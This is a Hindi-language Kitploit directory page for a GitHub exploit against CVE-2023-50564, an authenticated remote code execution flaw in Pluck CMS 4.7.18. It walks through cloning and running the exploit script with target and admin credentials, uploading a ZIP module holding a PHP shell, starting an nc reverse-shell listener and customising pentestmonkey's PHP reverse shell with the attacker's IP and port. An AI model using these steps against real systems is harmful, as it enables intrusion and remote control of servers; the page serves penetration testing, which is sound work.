Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - रिमोट कोड एक्ज़ीक्यूशन (RCE) | Kitploit
उपकरण/GitHubGitHub/glynzr/cve-2023-50564
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - रिमोट कोड एक्ज़ीक्यूशन (RCE)

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50564

📌 विवरण

यह एक्सप्लॉइट Pluck CMS v4.7.18 में एक प्रमाणित व्यवस्थापक को एक दुर्भावनापूर्ण ZIP मॉड्यूल अपलोड करने की अनुमति देता है, जिसमें PHP शेल होता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन (RCE) होता है।


⚙️ विशेषताएँ

  • एक मान्य उपयोगकर्ता नाम और पासवर्ड का उपयोग करके लक्ष्य पर प्रमाणीकरण करता है
  • प्रदान की गई PHP फ़ाइल से स्वचालित रूप से एक ZIP संग्रह बनाता है
  • मॉड्यूल को भेद्य installmodule एंडपॉइंट पर अपलोड करता है
  • पेलोड को ट्रिगर करता है और आउटपुट प्रदर्शित करता है
  • कस्टम लक्ष्य, पोर्ट, क्रेडेंशियल्स और शेल पथ का समर्थन करता है

🚀 उपयोग

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • पोर्ट वैकल्पिक है और निर्दिष्ट नहीं होने पर डिफ़ॉल्ट रूप से 80 होता है।
  • लक्ष्य निर्दिष्ट करते समय, IP पता या डोमेन नाम आवश्यक है (जैसे, 127.0.0.1 या test.domain)।

नमूना एक्सप्लॉइट

सबसे पहले, हमलावर मशीन पर रिवर्स शेल लिसनर शुरू किया जाना चाहिए (टर्मिनल का यह टैब समाप्त नहीं किया जाना चाहिए):

root@kitploit:~
nc -nvlp <specify port>

फिर, https://github.com/pentestmonkey/php-reverse-shell से PHP रिवर्स शेल डाउनलोड करें और इसे हमलावर मशीन के अनुसार कस्टमाइज़ करें। (IP, port)

एक्सप्लॉइट कोड को दूसरे टैब पर चलाएँ:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
टूल डाउनलोड करें